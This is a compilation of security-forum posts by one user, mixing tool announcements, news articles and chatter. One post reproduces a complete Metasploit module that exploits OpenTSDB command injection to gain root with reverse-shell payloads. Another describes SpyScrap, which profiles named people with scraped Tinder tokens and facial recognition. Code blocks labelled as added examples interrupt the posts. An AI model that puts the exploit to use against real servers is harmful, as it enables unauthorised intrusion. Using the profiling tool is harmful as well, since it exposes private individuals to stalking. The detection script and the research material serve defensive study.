Everything posted by Kev

  1. SpyScrap

    This is an OSINT tool. The main purpose is to collect information from different sources like Google, Tinder, Twitter and more. It combines facial recognition methods to filter the results and uses natural language processing for obtaining important entities from the websites where the user appears. The tool is able to calculate a final score which indicates the amount of public exposure a user has on the Internet. It has two different modules that can work independently: CLI and Web Interface. Both modules are built using docker and are easy to deploy. If you like the tool, give us a star!

    CLI

    CLI Module for web scraping: Tinder, Instagram, Yandex, Google, Facebook, BOE, Twitter

    Prerequisites: Docker and docker-compose

    Installation:

        docker build -t spyscrap .
        docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap [options]

    You must put the image you want to be used for facial recognition under the shared volume in docker as in the next example:

        docker run -ti -v /Users/ruthgnz/Documents/osint/SpyScrap/src/data:/spyscrap/data sp -t twitter -n "ruth gonzalez novillo" -i ./data/descarga.jpeg

    Usage:

        docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap [options]

    Get Tinder users and store data in sqlite3 database. Tinder Token must be captured when logging into Tinder App under Local Storage.

        docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap -t tinder -k TOKEN

    Search in google. Add -i to download images and do facial recognition. Add -p to only search in a specific site, e.g. Linkedin.

        docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap --tag google -n "<name surname>"
        docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap --tag google -n "<name surname>" -i <imagePath>
        docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap --tag google -n "<name surname>" -i <imagePath> -p "<Place>"

    Search twitter profiles.

        docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap -t twitter -n "<name surname>" -s <number of twitter pages to search>

    Search facebook profiles. Add -i to download images and do facial recognition.

        docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap -t facebook -n "<name surname>"
        docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap --tag facebook -n "<name surname>" -i <imagePath>

    Search instagram profiles. Add -i to download the instagram profile image and do facial recognition.

        docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap -t instagram -n "<name surname>"
        docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap -t instagram -n "<name surname>" -i <imagePath>

    Search DNI, Names and Surnames in BOE.

        docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap -t boe -n "<text to search>" -s <number of BOE pages to search>
        docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap -t boe -n "<text to search>" -s <number of BOE pages to search> -e <boolean> -d <init date> -f <final date>

    OTHER EXAMPLES (Yandex reverse image search):

        docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap main.py -t yandex -k <imgur id> -i <imagePath>
        docker run -ti -v /PATH/TO/SpyScrap/src/data:/spyscrap/data spyscrap main.py -t yandex -i <imgUrl>

    All the results are stored in the docker shared volume you must have configured on your localhost when running the container. The first part is the path for your local folder and you can change it. The second part must be the one in the example (/spyscrap/data):

        -v /PATH/TO/SpyScrap/src/data:/spyscrap/data

    Web Interface

    This is a wrapper for the CLI.

    Prerequisites: Docker and docker-compose

    Installation:

        cd web
        docker-compose up

    Once the images are built, open the browser: http://localhost

    For searching in Tinder you must put the database.db file created using the CLI in the volume inside the folder: SpyScrap\web\data

    You will also find in this folder the results of all your searches on the web interface.

    DISCLAIMER

    This tool is for educational purposes only. Please only use this tool on systems you have permission to access! Ethical use only. Any actions and or activities related to the tools we have created is solely your responsibility. The misuse of the tools we have created can result in criminal charges brought against the persons in question. We will not be held responsible in the event any criminal charges be brought against any individuals misusing the tools we have made to break the law.

    Authors: Ruth González - @RuthGnz, Miguel Hernández - @MiguelHzBz

    Thanks: BBVA Next Technologies SecLab Team

    Feel free to collaborate!! By @RuthGnz & @MiguelHzBz

    Download: SpyScrap-master.zip or git clone https://github.com/RuthGnz/SpyScrap.git
    Source
  2. Naturally: https://googlethatforyou.com?q=insite%3Arstforums.com%2Fforum filmeonline.ro
  3. modreveal

    modreveal is a small utility that prints the names of hidden LKMs if any exist.

    Usage:

        make
        sudo ./modreveal

    Notes: To test the utility, you can use the Diamorphine rootkit (https://github.com/m0nad/Diamorphine). The author runs Arch Linux LTS kernel, so it is only guaranteed to work on Arch Linux LTS kernel. It will most likely work with your kernel too unless you are running something ancient or really new that breaks something.

    Download: modreveal-master.zip or git clone https://github.com/jafarlihi/modreveal.git
    Source
  4. This Metasploit module exploits an unauthenticated command injection vulnerability in the yrange parameter in OpenTSDB through 2.4.0 (CVE-2020-35476) in order to achieve unauthenticated remote code execution as the root user. The module first attempts to obtain the OpenTSDB version via the api. If the version is 2.4.0 or lower, the module performs additional checks to obtain the configured metrics and aggregators. It then randomly selects one metric and one aggregator and uses those to instruct the target server to plot a graph. As part of this request, the yrange parameter is set to the payload, which will then be executed by the target if the latter is vulnerable. This module has been successfully tested against OpenTSDB version 2.3.0.

    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::CmdStager
      prepend Msf::Exploit::Remote::AutoCheck

      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'OpenTSDB 2.4.0 unauthenticated command injection',
            'Description' => %q{
              This module exploits an unauthenticated command injection vulnerability in the yrange parameter
              in OpenTSDB through 2.4.0 (CVE-2020-35476) in order to achieve unauthenticated remote code execution
              as the root user. The module first attempts to obtain the OpenTSDB version via the api. If the version
              is 2.4.0 or lower, the module performs additional checks to obtain the configured metrics and aggregators.
              It then randomly selects one metric and one aggregator and uses those to instruct the target server to
              plot a graph. As part of this request, the yrange parameter is set to the payload, which will then be
              executed by the target if the latter is vulnerable. This module has been successfully tested against
              OpenTSDB version 2.3.0.
            },
            'License' => MSF_LICENSE,
            'Author' => [
              'Shai rod', # @nightrang3r - discovery and PoC
              'Erik Wynter' # @wyntererik - Metasploit
            ],
            'References' => [
              ['CVE', '2020-35476'],
              ['URL', 'https://github.com/OpenTSDB/opentsdb/issues/2051'] # disclosure and PoC
            ],
            'DefaultOptions' => {
              'RPORT' => 4242
            },
            'Platform' => %w[unix linux],
            'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
            'CmdStagerFlavor' => %w[bourne curl wget],
            'Targets' => [
              [
                'Automatic (Unix In-Memory)',
                {
                  'Platform' => 'unix',
                  'Arch' => ARCH_CMD,
                  'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
                  'Type' => :unix_memory
                }
              ],
              [
                'Automatic (Linux Dropper)',
                {
                  'Platform' => 'linux',
                  'Arch' => [ARCH_X86, ARCH_X64],
                  'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
                  'Type' => :linux_dropper
                }
              ]
            ],
            'Privileged' => true,
            'DisclosureDate' => '2020-11-18',
            'DefaultTarget' => 1,
            'Notes' => {
              'Stability' => [ CRASH_SAFE ],
              'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
              'Reliability' => [ REPEATABLE_SESSION ]
            }
          )
        )

        register_options [
          OptString.new('TARGETURI', [true, 'The base path to OpenTSDB', '/']),
        ]
      end

      def check
        # sanity check to see if the target is likely OpenTSDB
        res1 = send_request_cgi({
          'method' => 'GET',
          'uri' => normalize_uri(target_uri.path)
        })

        unless res1
          return CheckCode::Unknown('Connection failed.')
        end

        unless res1.code == 200 && res1.get_html_document.xpath('//title').text.include?('OpenTSDB')
          return CheckCode::Safe('Target is not an OpenTSDB application.')
        end

        # get the version via the api
        res2 = send_request_cgi({
          'method' => 'GET',
          'uri' => normalize_uri(target_uri.path, 'api', 'version')
        })

        unless res2
          return CheckCode::Unknown('Connection failed.')
        end

        unless res2.code == 200 && res2.body.include?('version')
          return CheckCode::Detected('Target may be OpenTSDB but the version could not be determined.')
        end

        begin
          parsed_res_body = JSON.parse(res2.body)
        rescue JSON::ParserError
          return CheckCode::Detected('Could not determine the OpenTSDB version: the HTTP response body did not match the expected JSON format.')
        end

        unless parsed_res_body.is_a?(Hash) && parsed_res_body.key?('version')
          return CheckCode::Detected('Could not determine the OpenTSDB version: the HTTP response body did not match the expected JSON format.')
        end

        version = parsed_res_body['version']

        begin
          if Rex::Version.new(version) <= Rex::Version.new('2.4.0')
            return CheckCode::Appears("The target is OpenTSDB version #{version}")
          else
            return CheckCode::Safe("The target is OpenTSDB version #{version}")
          end
        rescue ArgumentError => e
          return CheckCode::Unknown("Failed to obtain a valid OpenTSDB version: #{e}")
        end
      end

      def select_metric
        # check if any metrics have been configured. if not, exploitation cannot work
        res = send_request_cgi({
          'method' => 'GET',
          'uri' => normalize_uri(target_uri.path, 'suggest'),
          'vars_get' => {
            'type' => 'metrics'
          }
        })

        unless res
          fail_with(Failure::Unknown, 'Connection failed.')
        end

        unless res.code == 200
          fail_with(Failure::UnexpectedReply, "Received unexpected status code #{res.code} when checking the configured metrics")
        end

        begin
          metrics = JSON.parse(res.body)
        rescue JSON::ParserError
          fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured metrics: The response body did not contain valid JSON.')
        end

        unless metrics.is_a?(Array)
          fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured metrics: The response body did not contain a JSON array')
        end

        if metrics.empty?
          fail_with(Failure::NoTarget, 'Failed to identify any configured metrics. This makes exploitation impossible')
        end

        # select a random metric since any will do
        @metric = metrics.sample
        print_status("Identified #{metrics.length} configured metrics. Using metric #{@metric}")
      end

      def select_aggregator
        # check the configured aggregators and select one at random
        res = send_request_cgi({
          'method' => 'GET',
          'uri' => normalize_uri(target_uri.path, 'aggregators')
        })

        unless res
          fail_with(Failure::Unknown, 'Connection failed.')
        end

        unless res.code == 200
          fail_with(Failure::UnexpectedReply, "Received unexpected status code #{res.code} when checking the configured aggregators")
        end

        begin
          aggregators = JSON.parse(res.body)
        rescue JSON::ParserError
          fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured aggregators: The response body did not contain valid JSON.')
        end

        unless aggregators.is_a?(Array)
          fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured aggregators: The response body did not contain a JSON array')
        end

        if aggregators.empty?
          fail_with(Failure::NoTarget, 'Failed to identify any configured aggregators. This makes exploitation impossible')
        end

        # select a random aggregator since any will do
        @aggregator = aggregators.sample
        print_status("Identified #{aggregators.length} configured aggregators. Using aggregator #{@aggregator}")
      end

      def execute_command(cmd, _opts = {})
        # use base64 to avoid special char escape hell (specifying BadChars did not help)
        cmd = "'echo #{Base64.strict_encode64(cmd)} | base64 -d | /bin/sh'"

        start_time = rand(20.year.ago..10.year.ago) # this should be a date far enough in the past to make sure we capture all possible data
        start_value = start_time.strftime('%Y/%m/%d-%H:%M:%S')
        end_time = rand(1.year.since..10.year.since) # this can be a date in the future to make sure we capture all possible data
        end_value = end_time.strftime('%Y/%m/%d-%H:%M:%S')

        get_vars = {
          'start' => start_value,
          'end' => end_value,
          'm' => "#{@aggregator}:#{@metric}",
          'yrange' => "[1:system(#{Rex::Text.uri_encode(cmd)})]",
          'wxh' => "#{rand(800..1600)}x#{rand(400..600)}",
          'style' => 'linespoint'
        }

        exploit_uri = '?'
        get_vars.each do |key, value|
          exploit_uri += "#{key}=#{value}&"
        end
        exploit_uri += 'json'

        # using a raw request because cgi was leading to encoding issues
        send_request_raw({
          'method' => 'GET',
          'uri' => normalize_uri(target_uri.path, 'q' + exploit_uri)
        }, 0) # we don't have to wait for a reply here
      end

      def exploit
        select_metric
        select_aggregator

        if target.arch.first == ARCH_CMD
          print_status('Executing the payload')
          execute_command(payload.encoded)
        else
          execute_cmdstager(background: true)
        end
      end
    end

    # 0day.today [2022-12-25] #
    Source
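Detection-side counterpart to the module above, added here as an example and not part of the original post or of the Metasploit module: the module's IOC_IN_LOGS note reflects that each attempt leaves a GET to /q whose yrange value carries a gnuplot system() call, preceded by lookups of /api/version, /suggest?type=metrics and /aggregators, so an access-log scan can flag both. The log lines are constructed for the example; the endpoint and parameter names come from the module.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines in common log format; not traffic from any real system.
# 10.0.0.5 draws a normal graph; 10.0.0.9 follows the module's request sequence and then
# sends a yrange carrying a gnuplot system() call (the base64 here decodes to "hello").
SAMPLE_LOG = """\
10.0.0.5 - - [25/Dec/2022:10:01:02 +0000] "GET /q?start=1h-ago&m=sum:sys.cpu.user&yrange=[0:100]&wxh=800x400&json HTTP/1.1" 200 5123
10.0.0.9 - - [25/Dec/2022:10:01:07 +0000] "GET /api/version HTTP/1.1" 200 98
10.0.0.9 - - [25/Dec/2022:10:01:08 +0000] "GET /suggest?type=metrics HTTP/1.1" 200 211
10.0.0.9 - - [25/Dec/2022:10:01:08 +0000] "GET /aggregators HTTP/1.1" 200 140
10.0.0.9 - - [25/Dec/2022:10:01:09 +0000] "GET /q?start=2005%2F01%2F01-00%3A00%3A00&end=2030%2F01%2F01-00%3A00%3A00&m=sum%3Asys.cpu.user&yrange=%5B1%3Asystem%28%27echo%20aGVsbG8%3D%20%7C%20base64%20-d%20%7C%20%2Fbin%2Fsh%27%29%5D&wxh=1000x500&style=linespoint&json HTTP/1.1" 200 0
"""

REQUEST_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# A yrange produced by the graph UI is "[low:high]" with optional numeric bounds.
BENIGN_YRANGE_RE = re.compile(r'^\[\s*-?\d*(?:\.\d+)?\s*:\s*-?\d*(?:\.\d+)?\s*\]$')
# gnuplot evaluates system(...) inside the range expression; that is the injection primitive.
GNUPLOT_CALL_RE = re.compile(r'\bsystem\s*\(', re.IGNORECASE)
RECON_PATHS = ('/api/version', '/suggest', '/aggregators')


def parse_request(line):
    """Split one log line into client, timestamp, path and URL-decoded query parameters."""
    match = REQUEST_RE.match(line)
    if not match:
        return None
    req = match.groupdict()
    parts = urlsplit(req['target'])
    req['path'] = parts.path
    # keep_blank_values keeps the trailing "&json" the module appends
    req['params'] = parse_qs(parts.query, keep_blank_values=True)
    return req


def classify_yrange(value):
    """Return a reason string for a suspicious yrange, or None when it looks benign."""
    if GNUPLOT_CALL_RE.search(value):
        return 'gnuplot-system-call'
    if not BENIGN_YRANGE_RE.match(value):
        return 'non-numeric-yrange'
    return None


def find_yrange_injection(log_text):
    """Flag /q requests whose yrange is not a plain numeric range."""
    findings = []
    for line in log_text.splitlines():
        req = parse_request(line)
        if req is None or not req['path'].endswith('/q'):
            continue
        for value in req['params'].get('yrange', []):
            reason = classify_yrange(value)
            if reason:
                findings.append({'client': req['client'], 'ts': req['ts'],
                                 'reason': reason, 'yrange': value})
    return findings


def recon_clients(log_text):
    """Clients that hit all three endpoints the module queries before exploiting.
    A weak signal on its own (the web UI may do the same); use it to corroborate findings."""
    seen = {}
    for line in log_text.splitlines():
        req = parse_request(line)
        if req is None:
            continue
        for suffix in RECON_PATHS:
            if req['path'].endswith(suffix):
                seen.setdefault(req['client'], set()).add(suffix)
    return {client for client, paths in seen.items() if len(paths) == len(RECON_PATHS)}


if __name__ == '__main__':
    for hit in find_yrange_injection(SAMPLE_LOG):
        print('%(ts)s %(client)s %(reason)s yrange=%(yrange)s' % hit)
    print('recon sequence seen from:', sorted(recon_clients(SAMPLE_LOG)))
```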
  5. I second what M4T3! says, e.g. it won't index you: games0nline.ro jocurio#line.com. I can help you, send me a PM.
  6. You can find it on GitHub, good luck!
  7. 150 free crash courses from the best instructors on YouTube. Click on a topic to begin! 🚀 Skills: Python JavaScript Java PHP Ruby C# C++ Git CS Basics HTML & CSS WordPress Excel SQL APIs Databases AWS Linux Communication Career Tracks: Front-End Dev. Back-End Dev. Mobile Dev. DevOps Data Engineer Data Analyst Data Scientist UX Designer Product Manager Digital Marketer Source: hourups.com
  8. This is exactly how it goes with the "gangsters/trappers" of this life who talk on the phone holding stacks of $ bought on eBay, but in reality they are in a sorry state.
  9. A vulnerability discovered in GitHub Actions could allow an attacker to poison a developer's pipeline, highlighting the risk that insecure software pipelines pose.

    An attacker submitting changes to an open source repository on GitHub could cause downstream software projects that include the latest version of a component to compile updates with malicious code.

    That's according to software supply chain security firm Legit Security, which said in an advisory published on Dec. 1 that this "artifact poisoning" weakness could affect software projects that use GitHub Actions — a service for automating development pipelines — by triggering the build process when a change is detected in a software dependency.

    The vulnerability is not theoretical: Legit Security simulated an attack on the project that manages Rust, causing the project to recompile using a customized — and malicious — version of the popular GCC software library, the company stated in the advisory.

    The problem likely affects a large number of open source projects because maintainers typically will run tests on contributed code before they actually analyze the code themselves, says Liav Caspi, chief technology officer of Legit Security.

    "It is a common pattern today," he says. "A lot of open source projects today, upon a change request, they run a bunch of tests to validate the request because the maintainer does not want to have to review the code first. Instead, it automatically runs tests."

    The attack takes advantage of the automated build process through GitHub Actions. In the case of the Rust programming language, the vulnerable pattern could have allowed an attacker to execute code in a privileged way as part of the development pipeline, stealing repository secrets and potentially tampering with code, Legit Security said.

    "To put it simply: in a vulnerable workflow, any GitHub user can create a fork that builds an artifact," the company stated in its advisory. "Then inject this artifact into the original repository build process and modify its output. This is another form of a software supply chain attack, where the build output is modified by an attacker."

    The vulnerability enables an attack similar to the malware-insertion attack that targeted CodeCov and, through that company's software, its downstream customers.

    "[T]he lack of native GitHub implementation for cross-workflow artifacts communication led many projects and the GitHub Actions community to develop insecure solutions for cross-workflow communication and made this threat highly prevalent," Legit Security stated in the advisory.

    GitHub confirmed the issue and paid a bounty for the information, while Rust fixed its vulnerable pipeline, Legit Security stated.

    Software Supply Chain Needs Security

    The vulnerability is the latest security issue to affect software supply chains. Industry and government agencies have increasingly sought to bolster the security of open source software and software provided as a service. In May 2021, for example, the Biden administration released its executive order on Improving the Nation's Cybersecurity, a federal rule that, among other requirements, mandates that the government will require baseline security standards for any software it purchases.

    On the private industry side, Google and Microsoft have pledged billions of dollars to shore up security in the open source ecosystem, which provides the code that comprises more than three-quarters of the average application's codebase.

    Logical, But Vulnerable

    The security issue belongs to a hard-to-find class of problems known as logic issues, which include issues with permissions, the potential for forked repositories to be inserted into a pipeline, and a lack of differentiation between forked and base repositories.

    Because software projects often use automated scripts to check code submissions before forwarding them to the maintainers, pull requests will be run through automation before any human checks them for malicious code. While the automation saves time, it also should be considered a way for attackers to insert malicious code into the pipeline.

    "When you are doing open source development, the problem is bigger, because you are accepting contribution from anyone in the world," Caspi says. "You are executing things that you cannot trust."

    GitHub acknowledged the issue and expanded the ways of excluding submissions from outside collaborators from being automatically inserted into the Actions pipeline. The company updated its GetArtifact and ListArtifacts APIs with the goal of providing more information to help determine whether an artifact can be trusted.

    "Anyone that does anything like the Rust project did — trusting the input from a third party — then they are still vulnerable," Caspi says. "It is a logic problem. GitHub just made it easier to write a safer script."

    Via darkreading.com
  10. This archive contains all of the 69 exploits added to Packet Storm in November, 2022.

    Download: 202211-exploits.tgz (1.4 MB)
    Source
  11. Listen to college radio stations

    FAQ

    I don't see my college radio station. Can you add it?
    Absolutely! It's pretty easy for me to add new stations, and I'm always looking for new radio stations to listen to. Feel free to suggest stations via this form!

    What does it mean if a station is grayed out?
    If a station card is gray, that means the app is still loading its corresponding audio stream. It should be ready to play soon!

    Why do the stations periodically turn gray?
    In order to smoothly switch between streams, Campus FM keeps a small cache of audio data available for each station. After some time has passed, the cached audio gets stale and the app requests more recent content. The station is grayed out during this loading period.

    I've been waiting for a while now, why isn't my station loading?
    IT practices aren't consistent across all college radio stations. Sometimes they have security restrictions that prevent their audio streams from loading on certain apps and devices. And sometimes the audio streams just go offline for a while.

    The app isn't working on my device / I've spotted a bug / I'd like to see [insert feature here].
    That's awesome (or I'm sorry)! I'm still learning how to build web apps and I would love your feedback! If you have a GitHub account, you can open an issue directly on the Campus FM repo, or you can get in touch with me at hello.campusfm@gmail.com

    Can I get Campus FM on my phone/tablet?
    I'm working on native apps for iOS and Android!

    URL: https://www.campus-fm.com
    Source: github.com
  12. Feep! search (alpha) About Feep! search is a web search engine, focused on programming resources. It uses an independent index, currently totalling a bit over 29 million pages. (That’s slightly more than Google’s first index in 1998!) Result quality is rather variable, mainly because I haven’t tuned the ranking very well yet. See about Feep! search for more information. URL: https://search.feep.dev Source: github.com
  13. I'm not being lazy, most of them have PUA/Generic etc... 7/36 on VirusTotal. Edit: I don't understand how it sends a confirmation SMS since it has no SIM and no WiFi, and the programs mentioned ^ don't solve anything; I managed to get into it through Smart Switch.
  14. @mannnu in the first video the Indian guy asks for 2k, 3k, more than the phone is worth; I'm using it for personal use. The second video doesn't interest me, I want it like it came from the factory, otherwise I'll hand it in. Thanks anyway.
  15. Hi. I received a phone as a gift from an old lady, a Samsung Grand Prime (I don't know the model); I can't access the menu, I tried a Hard Reset, nothing, I tried with software tools but they all have PUA/Generic etc... How can I bring it back to factory state? She's asleep when I call her to send me the G-xxx, I've been trying for hours. Edit/ Model: Samsung sm-g531f. Edit// I also tried with Odin, I can't find the Firmware, the old lady doesn't know the e-mail password, I'm trying to flash it. Thanks.
  16. Simple C++ Encryption and Steganography tool that uses Password-Protected-Encryption to secure a file's contents, and then proceeds to embed it inside an image's pixel-data using Least-Significant-Bit encoding. For Linux based systems.

    Encoding:

        $ ./steganography encode -i data/orig.png -e data/jekyll_and_hyde.zip -o output.png
        Password: 1234
        * Image size: 640x426 pixels
        * Encoding level: Low (Default)
        * Max embed size: 132.38 KiB
        * Embed size: 61.77 KiB
        * Encrypted embed size: 61.78 KiB
        * Generated CRC32 checksum
        * Generated encryption key with PBKDF2-HMAC-SHA-256 (20000 rounds)
        * Encrypted embed with AES-256-CBC
        * Embedded jekyll_and_hyde.zip into image
        * Sucessfully wrote to output.png

    Original image: [image]

    Image with embedded ZIP containing the entire contents of the book "Dr Jekyll and Mr Hyde": [image]

    Decoding:

        $ ./steganography decode -i output.png -o "out - jekyll_and_hyde.zip"
        Password: 1234
        * Image size: 640x426 pixels
        * Generated decryption key with PBKDF2-HMAC-SHA-256 (20000 rounds)
        * Sucessfully decrypted header
        * File signatures match
        * Detected embed jekyll_and_hyde.zip
        * Encoding level: Low (Default)
        * Encrypted embed size: 61.78 KiB
        * Successfully decrypted the embed
        * Decrypted embed size: 61.77 KiB
        * CRC32 checksum matches
        * Successfully wrote to out - jekyll_and_hyde.zip

    Building:

        $ mkdir build
        $ cd build
        $ cmake -DCMAKE_BUILD_TYPE=Release ..
        $ make -j 4

    Usage:

        Usage: steganography [-h] {decode,encode}

        Optional arguments:
        -h, --help     shows help message and exits
        -v, --version  prints version information and exits

        Subcommands:
        decode  Decodes and extracts an embed-file from an image
        encode  Encodes an embed-file into an image

    Encoding:

        Usage: encode [-h] --input VAR --output VAR --embed VAR [--passwd VAR]

        Encodes an embed-file into an image

        Optional arguments:
        -h, --help     shows help message and exits
        -v, --version  prints version information and exits
        -i, --input    specify the input image. [required]
        -o, --output   specify the output image. [required]
        -e, --embed    specify the file to embed. [required]
        -p, --passwd   specify the encryption password.

    Decoding:

        Usage: decode [-h] --input VAR [--output VAR] [--passwd VAR]

        Decodes and extracts an embed-file from an image

        Optional arguments:
        -h, --help     shows help message and exits
        -v, --version  prints version information and exits
        -i, --input    specify the input image. [required]
        -o, --output   specify the output file. [default: ""]
        -p, --passwd   specify the encryption password.

    Theory Of Operation

    Encoding

    The program operates by first randomly generating a 128-bit Password Salt and a 128-bit AES Initialization Vector by reading binary data from /dev/urandom. It then uses that Password Salt as a parameter in generating an encryption key, by using PBKDF2-HMAC-SHA-256 on a user inputted string. A CRC32 hash of the file to embed is then calculated, and stored in the header to act as a checksum for the validity of the data. It then pads the binary data of the file to embed using the PKCS #7 algorithm, followed by actually encrypting both the header and the padded data, with AES-256 in CBC Mode, using the previously generated Initialization Vector. Now the data is actually encoded inside the image by first picking a random offset, and then going through each bit of data and storing it inside the actual image pixel data, which it accomplishes by setting the Least-Significant-Bit of each channel byte of each pixel.

    Decoding

    The decoding process works exactly the same as the encoding process previously described above, just in reverse. The only difference is that for decoding, after the program attempts to extract and decrypt the data, it compares some of the information in the header section in an attempt to validate the extraction process. The header fields which are compared are: the 4 byte file signature custom to this program, and the CRC32 hash of the decrypted data. If any of these fields do not match their correct values, the decryption process will fail. This should only happen if the file which you were attempting to decrypt does not actually contain an embed, if the password you entered is wrong, or if the image file was somehow corrupted.

    Detection

    While the detection of data being embedded in an image is a trivial task, theoretically there is no way of knowing that it was this program that did it, and theoretically there should be no known way to decrypt the data without knowing the password, that is without spending millions of years in the process of doing so.

    Disclaimer

    Do not use this program to encrypt and hide important data which you wish to keep away from prying eyes. This is just a simple proof-of-concept program that I made for fun. I'm no cryptographer. I'm just a hobbyist, use at your own risk.

    Copyright

    This software is licensed under MIT. Copyright © 2022 Zach Collins

    Download: steganography-main.zip or git clone https://github.com/7thSamurai/steganography.git
    Source
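The LSB layer and the header validation from the Theory Of Operation above, as an added example that is not the tool's own code: a signature, payload length and CRC32 header followed by the payload is written into the low bit of each cover byte (a raw byte buffer stands in for PNG channel data), and the extractor fails on exactly the two header checks the README lists, a signature mismatch when there is no embed and a CRC32 mismatch when a bit was corrupted. The 4-byte signature STEG is a placeholder because the tool's own value is not given, the offset is passed in explicitly because the README does not say how the random offset is recovered, and the PBKDF2/AES-256-CBC layer is left out.

```python
import struct
import zlib

# Placeholder 4-byte signature: the README says the tool uses one but does not give its value.
SIGNATURE = b'STEG'
HEADER_LEN = 4 + 4 + 4  # signature, big-endian payload length, CRC32 of the payload

# Constructed cover: 2048 "channel bytes" standing in for RGB pixel data of a small image.
COVER = bytes(range(256)) * 8
PAYLOAD = b'Dr Jekyll and Mr Hyde'


def capacity_bytes(cover_len, offset):
    """Bytes that fit when each cover byte carries exactly one payload bit."""
    return max(0, (cover_len - offset) // 8)


def _bits(data):
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def embed(cover, payload, offset=0):
    """Write header + payload into the LSB of each cover byte starting at offset."""
    header = SIGNATURE + struct.pack('>II', len(payload), zlib.crc32(payload) & 0xFFFFFFFF)
    blob = header + payload
    if len(blob) > capacity_bytes(len(cover), offset):
        raise ValueError('embed does not fit: %d bytes needed, %d available'
                         % (len(blob), capacity_bytes(len(cover), offset)))
    out = bytearray(cover)
    pos = offset
    for bit in _bits(blob):
        out[pos] = (out[pos] & 0xFE) | bit  # only the low bit of each byte changes
        pos += 1
    return bytes(out)


def _read(stego, pos, count):
    """Reassemble count bytes from the LSBs at stego[pos:]; returns (bytes, new_pos)."""
    out = bytearray()
    for _ in range(count):
        value = 0
        for _ in range(8):
            value = (value << 1) | (stego[pos] & 1)
            pos += 1
        out.append(value)
    return bytes(out), pos


def extract(stego, offset=0):
    """Recover the payload, failing on the conditions the README lists."""
    if capacity_bytes(len(stego), offset) < HEADER_LEN:
        raise ValueError('image too small to hold a header')
    header, pos = _read(stego, offset, HEADER_LEN)
    if header[:4] != SIGNATURE:
        raise ValueError('file signature mismatch: no embed at this offset or corrupted image')
    length, expected_crc = struct.unpack('>II', header[4:])
    if length > capacity_bytes(len(stego), pos):
        raise ValueError('header claims %d bytes but only %d fit'
                         % (length, capacity_bytes(len(stego), pos)))
    payload, _ = _read(stego, pos, length)
    if zlib.crc32(payload) & 0xFFFFFFFF != expected_crc:
        raise ValueError('CRC32 checksum mismatch: embed is corrupted')
    return payload


def _error_of(fn):
    try:
        fn()
    except ValueError as exc:
        return str(exc)
    return None


def round_trip_report(offset=40):
    """Embed, extract, and exercise the validation failures on the constructed cover."""
    stego = embed(COVER, PAYLOAD, offset)
    corrupted = bytearray(stego)
    corrupted[offset + HEADER_LEN * 8 + 5] ^= 1  # flip one bit inside the payload region
    return {
        'same_length': len(stego) == len(COVER),
        'only_lsb_changed': all((a ^ b) <= 1 for a, b in zip(COVER, stego)),
        'recovered': extract(stego, offset),
        'no_embed_error': _error_of(lambda: extract(COVER, offset)),
        'corrupted_error': _error_of(lambda: extract(bytes(corrupted), offset)),
        'too_large_error': _error_of(lambda: embed(COVER[:64], PAYLOAD, offset)),
    }


if __name__ == '__main__':
    for key, value in round_trip_report().items():
        print('%-18s %r' % (key, value))
```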
17. Project two years in the making aims to improve public services... or what's left of them

It's pork barrel time again. The UK government has named a slew of tech organizations that made it onto a £2 billion framework agreement that allows them to compete for big data and analytics public sector contracts.

The Cabinet Office-run Crown Commercial Service (CCS), which sets up procurement on behalf of government ministries and other public sector organizations, ran the process and awarded contracts to many of the usual suspects and some lesser known entities (see box).

According to the contract award notice, the government sees big data and analytics as an emerging and evolving capability, "with its prominence heightened by COVID." It claims the technology is "fast becoming recognised as business critical and a core business function, with many government departments now including chief data officers."

The notice says the procurement is required in part to support the National Data Strategy, a set of proposals for post-Brexit legislation which include changes to the remit of the Information Commissioner's Office, the data privacy watchdog.

The procurement notice said the contracted suppliers, which are set to vie for business on the framework, could help with the implementation of the government's "missions to reinforce the requirement to access and interrogate Government data more effectively to improve public services."

The government has taken more than a year to select the winning suppliers. It first announced plans to create the framework deal — a means of offering suppliers an indicative spending figure in exchange for structured pricing and preparedness for the work — in September last year, with a contract notice launching the competition following in November.

The framework is divided into two lots. The first looks for suppliers to design, build, and run professional services; the second is for commercial off-the-shelf software.

Launched in December 2020 by minister Oliver Dowden, the National Data Strategy talks of a "pro-growth and trusted data regime" that can transform the government's use of data and drive efficiency and so on.

